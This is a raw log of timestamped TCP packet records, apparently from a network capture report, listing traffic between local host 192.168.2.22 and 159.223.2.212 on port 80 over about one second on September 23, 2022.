Sep 23, 2022 08:13:08.924597025 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.924643993 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.924695015 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.924705029 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.924746037 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.924797058 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.924813032 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.924846888 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.924906969 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.924910069 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.924958944 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.925009966 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.925026894 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.925065041 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.925127029 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.925127983 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.925182104 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.925232887 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.925283909 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.925292969 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.925349951 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.925374985 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.925407887 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.925457954 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.925470114 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.925508022 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.925556898 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.925575972 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.925611019 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.925672054 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.925682068 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.925723076 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.925775051 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.925786972 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.925826073 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.925875902 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.925888062 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.925925970 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.925975084 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.925987959 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.926024914 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.926074982 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.926093102 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.926126003 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.926177979 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.926192999 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.933214903 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.950922012 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.951000929 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.951052904 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.951105118 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.951165915 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.951216936 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.951225996 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.951270103 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.951271057 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.951323032 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.951335907 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.951404095 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.951455116 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.951503992 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.951512098 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.951570034 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.951574087 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.951626062 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.951678038 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.951680899 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.951740980 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.951793909 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.951805115 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.951867104 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.951924086 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.951936960 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.951980114 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.952030897 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.952039957 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.952088118 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.952126026 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.952143908 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.952178001 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.952229023 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.952233076 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.952280045 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.952328920 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.952357054 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.952379942 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.952430964 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.952442884 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.952480078 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.952529907 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.952538967 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.952579021 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.952636957 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.952637911 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.952689886 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.952742100 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.952748060 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.952802896 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.952853918 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.952867985 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.952903032 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.952951908 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.952958107 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.953001976 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.953052044 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.953058958 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.953109026 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.953157902 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.953166008 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.953207016 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.953263044 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.957585096 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.957642078 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.957694054 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.957710981 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.957748890 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.957808971 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.957808971 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.957864046 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.957916975 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.957928896 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.978311062 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.978375912 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.978426933 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.978478909 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.978529930 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.978590012 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.978653908 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.978656054 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.978710890 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.978725910 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.978735924 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.978761911 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.978811026 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.978816986 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.978867054 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.978914976 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.978919029 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.978980064 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.979034901 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.979063034 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.979088068 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.979144096 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.979170084 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.979197979 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.979259014 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.979283094 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.979316950 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.979401112 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.979422092 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.979441881 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.979501009 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.979542971 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.979552984 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.979590893 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.979605913 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.979655981 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.979688883 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.979710102 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.979772091 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.979799986 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.979826927 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.979877949 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.979923010 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.979929924 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.979980946 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.980010986 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.980037928 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.980088949 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.980119944 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.980139017 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.980190039 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.980222940 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.980238914 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.980289936 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.980309010 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.980340004 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.980395079 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.980413914 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.980457067 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.980508089 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.980536938 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.980557919 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.980607986 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.980632067 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.980658054 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.980709076 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.980741024 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.980760098 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.980813026 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.980855942 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.980865955 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.980915070 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.980932951 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.980966091 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.980989933 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.981007099 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.981028080 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.981084108 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.981101036 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.981136084 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.981187105 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.981206894 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.981239080 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.981291056 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.981306076 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.981340885 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.981393099 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.981416941 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.981446028 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.981497049 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.981520891 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.981547117 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.981596947 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.981622934 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.981648922 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.981703043 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.981750011 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.981756926 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.981820107 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.981834888 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.981873035 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.981923103 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.981946945 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.981973886 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.982026100 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.982045889 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.982081890 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.982124090 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.982137918 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.982189894 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.982215881 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.982259035 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.982317924 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.982333899 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.982373953 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.982426882 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.982482910 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.982485056 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.982536077 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.982558012 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.982587099 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.982636929 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.982656002 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.982688904 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.982738972 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.982742071 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.982800961 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.982815027 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.982831955 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.982855082 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.982906103 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.982923985 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.982956886 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.983007908 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.983023882 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.983058929 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.983114004 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.983131886 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.983169079 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.983218908 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.983236074 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.983268976 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.983320951 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.983340979 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.983398914 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.983459949 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.983486891 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.983513117 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.983566999 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.983584881 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.983619928 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.983658075 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.983680010 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.983710051 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.983730078 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.983788967 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.983800888 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.983844995 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.983895063 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.983913898 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.983946085 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.983997107 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.984014988 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.984047890 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.984106064 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.984122038 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.984143972 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.984159946 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.984210968 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.984231949 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.984262943 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.984312057 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.984332085 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.984366894 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.984420061 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.984467030 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.984473944 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.984534025 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.984558105 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.984590054 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.984642029 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.984662056 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.984692097 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.984749079 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.984764099 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.984802961 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.984853029 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.984873056 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.984901905 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.984929085 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.984946012 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.984952927 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.985002995 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.985023022 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:08.985053062 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:08.985121965 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.010221958 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.010247946 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.010263920 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.010281086 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.010293961 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.010308981 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.010320902 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.010338068 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.010507107 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.010515928 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.010524035 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.010541916 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.010552883 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.010601997 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.010611057 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.010618925 CEST	80	49172	159.223.2.212	192.168.2.22
